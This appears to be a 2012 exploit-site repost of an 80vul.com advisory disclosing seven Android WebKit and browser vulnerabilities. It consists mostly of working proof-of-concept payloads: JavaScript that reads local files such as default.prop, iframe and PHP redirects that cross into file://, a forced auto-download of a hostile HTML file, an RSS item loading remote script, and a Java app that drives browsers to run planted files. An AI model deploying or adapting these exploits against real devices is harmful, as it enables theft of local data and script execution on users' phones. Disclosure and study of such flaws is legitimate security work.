Home / exploits Android Webkit XSS / Cross Domain Issues
Posted on 09 February 2012
Android Multiple Vulnerabilities Author: www.80vul.com [Email:5up3rh3i#gmail.com] Release Date: 2012/2/8 References: http://www.80vul.com/android/android-0days.txt Ph4nt0m Webzine 0x06 has been released[http://www.80vul.com/webzine_0x06/],there three papers on the android application security about the development environment,browser security, inter-application communication.And published a lot of 0days: [0day-NO.0] android-webkit local cross-domain vulnerability android-webkit allow local html files cross any http domain and the local file.demo: <script> var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); if(request.overrideMimeType) { request.overrideMimeType('text/xml'); } } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<versions.length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} } } xmlhttp=request; //xmlhttp.open("GET", "file://///default.prop", false); //xmlhttp.open("GET", "http://www.80vul.com/", false); xmlhttp.send(null); var ret = xmlhttp.responseText; alert(ret); </script> [0day-NO.1] android-webkit cross-protocol vulnerability this vul allow cross to the file protocol from http. demo: <iframe name=f src="location.php" ></iframe> <script> function init(){ f.location = "file:///default.prop"; } setTimeout(init,5000) </script> location.php codz: <?php header("Location:file:///80vul.com"); ?> [0day-NO.2] android-webkit file:// protocol xss vulnerability ON android-webkit File:// protocol, the lack of filtering on the directory and file name,Lead to cross-site scripting attacks. demo: visit this : file:///80vul.com/<script>alert(1);</script> [0day-NO.3] android-browser/firefox auto download the file vulnerability android-browser/firefox Handle the Content-Disposition: attachment, lack of safety tips.So through this vul allows users to automatically download the evil html file to the local directory. test this code: <? //autodown.php header("Content-Disposition: attachment:filename=autodown.htm"); $data=<<<android_xss_go <script>alert(/xss/);</script> android_xss_go; print $data; ?> the local file name and the path: android 1.x --> /sdcard/download/autodown.html android 2.x-3.x --> /sdcard/download/autodown.htm android 4.0 --> /sdcard/download/autodown.php firefox --> /sdcard/download/autodown.php So,Let's play a jigsaw puzzle: POC[1]: //[0day-NO.1]+[0day-NO.2] <iframe name=f src="location.php" ></iframe> <script> function init(){ f.location = "file:///ssss<sc"+"ript>alert(1);</sc"+"ript>/"; } setTimeout(init,5000) </script> POC[2]: //[0day-NO.1]+[0day-NO.3] <meta http-equiv="refresh" content="0;URL=autodown.php"/> <iframe name=f src="location.php" ></iframe> <script> function init(){ f.location = "file:///sdcard/Download/autodown.htm"; } setTimeout(init,5000) </script> Now ,We can execute arbitrary js code on the local domain, and we can cross any http domain and the local file used [0day-NO.0]. and go on ... [0day-NO.4] webview.loadDataWithBaseURL() cross-protocol vulnerability By controlling the second argument of webview.loadDataWithBaseURL(),can cross the file:// protocol use javascript,like <script>window.location='file://///default.prop';</script> .so the dome apk demo: WebView webview; webview = (WebView) findViewById(R.id.webview); webview.getSettings().setJavaScriptEnabled(true); webview.setWebChromeClient(new WebChromeClient()); String data="80vul<script>window.location='file://///default.prop';</script>"; webview.loadDataWithBaseURL("http://www.baidu.com/", data, "text/html", "utf-8", null); [0day-NO.5] com.htc.googlereader XSS vulnerability com.htc.googlereader is an app on HTC Mobile [G10], there is a xss vul on this app, then Decompilation and Found this codz: label399: String str = this.mHeadlineShown.getSummary(); if (str.trim().contains("<iframe")) { this.mWebView.loadData(str, "text/html", "utf-8"); break label246; } this.mWebView.loadDataWithBaseURL("http://", str, "text/html", "utf-8", null); break label246; the "str" have no filter and can be controlled by evil RSS: <item> <guid>http://www.80vul.com</guid> <title>0day-NO.5</title> <link>http://www.80vul.com</link> <description><![CDATA[aa<script src=' http://www.80vul.com/xss.js'></script>]]></description> <dc:creator>80vul</dc:creator> <category>anddoid</category> <pubDate>Sun, 04 Sep 2011 13:01:40 -0500</pubDate> </item> When opens the unread status of the rss, u can get the XSS vul. and this is mWebView.loadDataWithBaseURL(),so can cross file:// by [0day-NO.4]. [0day-NO.6] Some Browsers for android Cross-Application Scripting Vulnerability the evil app can cross browser and execute arbitrary js code on the local domain. the demo app codz: //codz base on http://blog.watchfire.com/files/advisory-android-browser.pdf package com.x; //opera //com.opera.browser com.opera.Opera //firefox //org.mozilla.firefox org.mozilla.firefox.App //android //com.android.browser com.android.browser.BrowserActivity import android.app.Activity; import android.content.ComponentName; import android.content.Intent; import android.net.Uri; import android.os.Bundle; public class TesttestActivity extends Activity { static final String mPackage = "com.android.browser"; static final String mClass = "com.android.browser.BrowserActivity"; static final String gomPackage = "com.opera.browser"; static final String gomClass = "com.opera.Opera"; static final String mUrl = "http://www.80vul.com/autodown.php"; static final int mSleep = 15000; @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.main); startBrowserActivity(mUrl); try { Thread.sleep(mSleep); } catch (InterruptedException e) {} startBrowserActivitygo("file:///sdcard/Download/g.htm"); } private void startBrowserActivity(String url) { Intent res = new Intent("android.intent.action.VIEW"); res.setComponent(new ComponentName(mPackage,mClass)); res.setData(Uri.parse(url)); startActivity(res); } private void startBrowserActivitygo(String url) { Intent res = new Intent("android.intent.action.VIEW"); res.setComponent(new ComponentName(gomPackage,gomClass)); res.setData(Uri.parse(url)); startActivity(res); } } hitest
